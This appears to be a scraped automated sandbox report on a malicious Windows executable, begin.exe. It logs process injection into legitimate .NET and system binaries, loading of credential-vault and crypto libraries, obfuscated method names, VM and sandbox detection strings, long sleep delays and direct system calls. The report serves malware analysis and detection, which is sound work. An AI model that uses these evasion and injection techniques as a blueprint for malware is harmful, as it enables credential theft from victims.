Source: C:\Users\user\Desktop\begin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	Process created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\begin.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: Yara match	File source: 0.2.begin.exe.5950000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.begin.exe.5950000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.begin.exe.3db9550.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.begin.exe.3db9550.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1898946786.0000000005950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1891732318.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1883854982.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: begin.exe PID: 7756, type: MEMORYSTR

Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_061ACA92 push 061ACB0Ah; retf	0_2_061ACAEC
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_061A9A80 push es; iretd	0_2_061A9AA4
Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_06721F50 push es; ret	0_2_06721F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004032D0 push eax; ret	11_2_004032D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00406B56 push edx; ret	11_2_00406B7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00417BD0 push edx; ret	11_2_00417BD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00414C05 pushad ; retf	11_2_00414C08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004074DA push ecx; iretd	11_2_004074F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00404CE6 push ebx; retf	11_2_00404CE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040D56F push ebp; retf	11_2_0040D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0041F573 push esi; iretd	11_2_0041F53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00423D33 push cs; retf	11_2_00423DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00404DEF push esp; retf	11_2_00404DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004076AA push 7211FBE9h; retf	11_2_004076B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0110225F pushad ; ret	11_2_011027F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011027FA pushad ; ret	11_2_011027F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011309AD push ecx; mov dword ptr [esp], ecx	11_2_011309B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0110283D push eax; iretd	11_2_01102858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0110135E push eax; iretd	11_2_01101369
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038B225F pushad ; ret	14_2_038B27F9
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038B27FA pushad ; ret	14_2_038B27F9
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038E09AD push ecx; mov dword ptr [esp], ecx	14_2_038E09B6
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038B283D push eax; iretd	14_2_038B2858
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_038B1368 push eax; iretd	14_2_038B1369
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030A43D7 push 7211FBE9h; retf	14_2_030A43DE
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030A4207 push ecx; iretd	14_2_030A4223
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030BC2A0 push esi; iretd	14_2_030BC26B
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030B61AB push es; ret	14_2_030B61AE
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030BC43E push ecx; iretd	14_2_030BC43F
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030C0A60 push cs; retf	14_2_030C0B0D
Source: C:\Windows\SysWOW64\comp.exe	Code function: 14_2_030B48FD push edx; ret	14_2_030B48FE

Source: begin.exe, Wm89Lqi4.cs	High entropy of concatenated method names: 'Fd40Cbe7', 'Xd96Jsp3', 'e9A5NyLn', 'k7PYx6t9', 'Dt67Gco5', 'a6YGd2c1', 'Ss29WyPm', 'Pb42Zxt0', 'f7QBi40K', 'j4W6Eqb0'
Source: begin.exe, Lg4q1YNc.cs	High entropy of concatenated method names: 'n3G9Hkw1', 'MoveNext', 'De2b3L9F', 'SetStateMachine', 'j1Y8Qtb9', 'Cm5p3QPd', 'a0Q1Rky2', 't5R4Zwx2', 'g5ZWj81D', 'De2q1TAy'
Source: begin.exe, c7S0XdZf.cs	High entropy of concatenated method names: 'b0RHo6z5', 'Mf63Gqn2', 'i6YAj49F', 'Dz62QcNp', 'i8BRt1x2', 'a0XKj72R', 'o0K1Ceb2', 'i8T4RgBr', 'Xb56Bfw3', 'e8R7DyMz'
Source: begin.exe, e1G6Tmw3.cs	High entropy of concatenated method names: 'Nt43CeFj', 'Wt67Akz9', 'No14Dkj5', 'Ms74NpTt', 'a5NBn68R', 'Xq8g0S5A', 'g7QCp98W', 'n5BRy82L', 'Qq2s6A4B', 'y4RAk93S'
Source: begin.exe, g2AZi8q5.cs	High entropy of concatenated method names: 'Lm7a4AGe', 'o2JTz7q3', 'Wn91Cbk6', 'Qy13KdRx', 'Ka1d0R9D', 'Eo64BiGf', 'An6j3S5G', 'Sn61Ysy0', 'Zb03Fdr1', 'x9XTt73L'
Source: begin.exe, j9MAp5g4.cs	High entropy of concatenated method names: 'k9D6LrQs', 'MoveNext', 'Sr0q6P4G', 'SetStateMachine', 'Gj10CzTg', 'r3NDq79Y', 's0GKd28W', 'Zf82Dpw5', 'Da7p0NAi', 'Er4c9H3G'
Source: begin.exe, i4BWg9r1.cs	High entropy of concatenated method names: 'Re1s5MHr', 'e1F8AwBp', 'Xm7n2QFg', 'z4D2NiKs', 'x0Z6RdQb', 'Gx3k8BKi', 'Ln75DkZd', 'k8Q6NnGt', 'Bn3y6Z8G', 'Pk30Hgm1'
Source: begin.exe, Qt62JbAr.cs	High entropy of concatenated method names: 's7F3Tgx5', 'MoveNext', 'Lf98Cpt7', 'SetStateMachine', 'Hw20LoTg', 'p2R3AzPi', 'Kw5e7W2D', 'Bd24Wrq6', 'w1XBy4t5', 'Bw02Gej7'

Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FFCC372D7E4
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FFCC372D944
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FFCC372D504
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FFCC372D544
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 7FFCC372DA44

Source: C:\Users\user\Desktop\begin.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Memory allocated: 8500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Memory allocated: 9500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Memory allocated: 96E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Memory allocated: A6E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Memory allocated: AAA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Memory allocated: BAA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Memory allocated: CAA0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\begin.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\comp.exe	API coverage: 2.6 %

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report begin.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

Windows Analysis Report
begin.exe

Source: C:\Users\user\Desktop\begin.exe TID: 7804	Thread sleep time: -3661000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe TID: 8152	Thread sleep time: -66000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe TID: 7252	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe TID: 7804	Thread sleep time: -312000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe TID: 7776	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: begin.exe, 00000000.00000002.1898946786.0000000005950000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: VBoxTray
Source: begin.exe, 00000000.00000002.1898946786.0000000005950000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
Source: comp.exe, 0000000E.00000002.2475910554.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000F.00000002.2477461403.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000002.2297461173.000001D1383CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\begin.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtCreateFile: Direct from: 0x77752FEC	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtOpenFile: Direct from: 0x77752DCC	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtSetInformationThread: Direct from: 0x777463F9	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtQueryInformationToken: Direct from: 0x77752CAC	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtProtectVirtualMemory: Direct from: 0x77752F9C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtSetInformationProcess: Direct from: 0x77752C5C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtNotifyChangeKey: Direct from: 0x77753C2C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtOpenKeyEx: Direct from: 0x77752B9C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtOpenSection: Direct from: 0x77752E0C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtAllocateVirtualMemory: Direct from: 0x777548EC	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtQueryVolumeInformationFile: Direct from: 0x77752F2C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtQuerySystemInformation: Direct from: 0x777548CC	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtAllocateVirtualMemory: Direct from: 0x77752BEC	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtDeviceIoControlFile: Direct from: 0x77752AEC	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtCreateUserProcess: Direct from: 0x7775371C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtWriteVirtualMemory: Direct from: 0x7775490C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtQueryInformationProcess: Direct from: 0x77752C26	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtResumeThread: Direct from: 0x77752FBC	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtReadVirtualMemory: Direct from: 0x77752E8C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtCreateKey: Direct from: 0x77752C6C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtSetInformationThread: Direct from: 0x77752B4C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtQueryAttributesFile: Direct from: 0x77752E6C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtAllocateVirtualMemory: Direct from: 0x77753C9C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtClose: Direct from: 0x77752B6C
